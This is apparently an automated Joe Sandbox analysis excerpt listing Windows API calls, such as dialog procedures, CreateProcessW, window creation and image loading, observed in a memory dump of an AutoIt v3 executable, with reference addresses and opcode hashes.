                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00DDF41A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 212c90067917ede75bc9460d59944869c055cc3e8864a4228cd92a7e0d26bc5c
                                                                                                                  • Instruction ID: fea446af04ac71b2611aaaffeb8131e274595eae0171a729d4088fa8a5d6f0d3
                                                                                                                  • Opcode Fuzzy Hash: 212c90067917ede75bc9460d59944869c055cc3e8864a4228cd92a7e0d26bc5c
                                                                                                                  • Instruction Fuzzy Hash: 2CF03931240289AFDB219F58DC0AF963B95EB06360F048459BA11672E1CA71A820E764
                                                                                                                  APIs
                                                                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00DB7DF8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: mouse_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2434400541-0
                                                                                                                  • Opcode ID: ff1636af42ccf90b02751c8a08d86363e9ee34e2d0cbe551c57439f28d8eca5b
                                                                                                                  • Instruction ID: 9ccbe44606d42abbf42eaf4c18bb39997a08c29aa68d12e769ef3a8000e8776d
                                                                                                                  • Opcode Fuzzy Hash: ff1636af42ccf90b02751c8a08d86363e9ee34e2d0cbe551c57439f28d8eca5b
                                                                                                                  • Instruction Fuzzy Hash: 5FD09EA556C60AFBFE1907209C2FFFA1109EBC17C1FE89649B143CA5C1EC94A8449435
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00D8ACC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: c7f5fe9c504a14bdcbe0c7db4c33afaeb94b7b6c799a0c7542bb0671fc2b113a
                                                                                                                  • Instruction ID: 64d8ae253c1443cb66821da1cdeac141795eaad6fdba25403d83dbd52e198ab4
                                                                                                                  • Opcode Fuzzy Hash: c7f5fe9c504a14bdcbe0c7db4c33afaeb94b7b6c799a0c7542bb0671fc2b113a
                                                                                                                  • Instruction Fuzzy Hash: D7E0EC35100208FBDF09AF95DC56E643F26FB49354F108459F6055A2A1CA33E522EB65
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00DEF3D4,?,?,?,?,?,?), ref: 00DDF450
                                                                                                                    • Part of subcall function 00DDE13E: _memset.LIBCMT ref: 00DDE14D
                                                                                                                    • Part of subcall function 00DDE13E: _memset.LIBCMT ref: 00DDE15C
                                                                                                                    • Part of subcall function 00DDE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E33EE0,00E33F24), ref: 00DDE18B
                                                                                                                    • Part of subcall function 00DDE13E: CloseHandle.KERNEL32 ref: 00DDE19D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2364484715-0
                                                                                                                  • Opcode ID: d1f56faa051b37bca3b06dc082b9ad39ead4d4350a9804260d9e8fc97a7d8234
                                                                                                                  • Instruction ID: a38fb9db404b486a8d92745dcaa036ba48c0eeb5230682ac81f175216df245ca
                                                                                                                  • Opcode Fuzzy Hash: d1f56faa051b37bca3b06dc082b9ad39ead4d4350a9804260d9e8fc97a7d8234
                                                                                                                  • Instruction Fuzzy Hash: 99E09231210209DFCB11AF58DC45E9A3BA6FB09350F058056FA055B3B2C771E961EF65
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00DDF3D0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 44c027fa9980a70d76630a86b913c2278c29da41cf515703e7578e74c5955408
                                                                                                                  • Instruction ID: bff3ad8975e11a5ae7fe19e197538c2121d4121acf5e62f4914cfc6bf880eea3
                                                                                                                  • Opcode Fuzzy Hash: 44c027fa9980a70d76630a86b913c2278c29da41cf515703e7578e74c5955408
                                                                                                                  • Instruction Fuzzy Hash: 29E0E23420020CEFCB01DF88D849E963BA6FB1A350F004094FD048B362C772A824EBA1
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00DDF3A1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 6949bacf2a125799725d5280d38b3640846cdd00cd1d0af2286860ed0097c821
                                                                                                                  • Instruction ID: 6c17b8ef0dad52f08937b1485e677573198b7699f8593acfa9f43f781753e473
                                                                                                                  • Opcode Fuzzy Hash: 6949bacf2a125799725d5280d38b3640846cdd00cd1d0af2286860ed0097c821
                                                                                                                  • Instruction Fuzzy Hash: A5E0E23420420CEFCB01DF88D849E963BA6FB1A350F004094FD048B361C772A820EB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                    • Part of subcall function 00D8B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D8B85B), ref: 00D8B926
                                                                                                                    • Part of subcall function 00D8B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D8B85B,00000000,?,?,00D8AF1E,?,?), ref: 00D8B9BD
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00D8AF1E,?,?), ref: 00D8B864
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2797419724-0
                                                                                                                  • Opcode ID: db57ab43fbed4ea12b123d271823a5f8ac4ae1f15a85941485d3d53873d1bce7
                                                                                                                  • Instruction ID: d497012ce12062de918ef0baba804eeb43415a73371c262c669e99135d2f8454
                                                                                                                  • Opcode Fuzzy Hash: db57ab43fbed4ea12b123d271823a5f8ac4ae1f15a85941485d3d53873d1bce7
                                                                                                                  • Instruction Fuzzy Hash: B4D0127114430C77DF103B65DC0BF593E1EEB41750F408431F705692E18A71A410E679
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D98E1F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  • Opcode ID: 94b902b4fe78965c4c40a8027078e14f4c67d7be85990d29e73f2a7d302884ea
                                                                                                                  • Instruction ID: 82eb3111564e6f581d9707e59813699df487be6697daf684f10946b22453f686
                                                                                                                  • Opcode Fuzzy Hash: 94b902b4fe78965c4c40a8027078e14f4c67d7be85990d29e73f2a7d302884ea
                                                                                                                  • Instruction Fuzzy Hash: 7DA0123000460CA78B001B51FC044587F9ED6041507008010F50C40121873354108591
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00D96AE9,00E267D8,00000014), ref: 00D9A937
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  • Opcode ID: cf84297ab659131237e58d258d27b41353d280c3b2f0e3b464beec83dfc41779
                                                                                                                  • Instruction ID: 4b67fce625470836b5ab66b4233ad12d57ca6edc4123264356f7af32f6d2f546
                                                                                                                  • Opcode Fuzzy Hash: cf84297ab659131237e58d258d27b41353d280c3b2f0e3b464beec83dfc41779
                                                                                                                  • Instruction Fuzzy Hash: C3B012B03033028FD7084B3DAC6822E3ED657C9101301807D7003C2A60DB30C410DF00
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction ID: 4e9e658ddcf0d71ae9a5381c4fa6d92b2e0a0f49286271f04526c09027e8cd3b
                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                  • Instruction Fuzzy Hash: F8C1A2762052A34DDF2D863AD43543EBEA15EA27B131E076DE8B3CB4C4EE24C964D670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction ID: b47d97944a753a087511de53928e54911464b9d2751acaaec68097355b986a56
                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                  • Instruction Fuzzy Hash: 69C1E2762051A34EDF6D863AC43443EBEA15AA27B131E07ADD8B3CB4C4EE24C964D670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                  • Instruction ID: ffbe8900f55dca962bb6decda1edd20bf9074edc8004228c420e426eba56bcb4
                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                  • Instruction Fuzzy Hash: 27C1B2722052934EDF2D863AE43443EFEA15AA27B531E076DD8B3CB4C4EE24D964D670
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction ID: 06c23020fa5df8c16432550bad5935f28ac9590e2afca920ea80042d2b52725f
                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                  • Instruction Fuzzy Hash: 0FC1D1722051934EDF2D863AA43443EBFA15EA27B131E076DD8B3CB4C1EE24D964D6B0
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DCA7A5
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DCA7B7
                                                                                                                  • DestroyWindow.USER32 ref: 00DCA7C5
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DCA7DF
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DCA7E6
                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00DCA927
                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DCA937
                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA97F
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00DCA98B
                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DCA9C5
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA9E7
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCA9FA
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA05
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DCAA0E
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA1D
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DCAA26
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAA2D
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DCAA38
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00DCAA4A
                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DFD9BC,00000000), ref: 00DCAA60
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DCAA70
                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00DCAA96
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DCAAB5
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCAAD7
                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DCACC4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                  • API String ID: 2211948467-2373415609
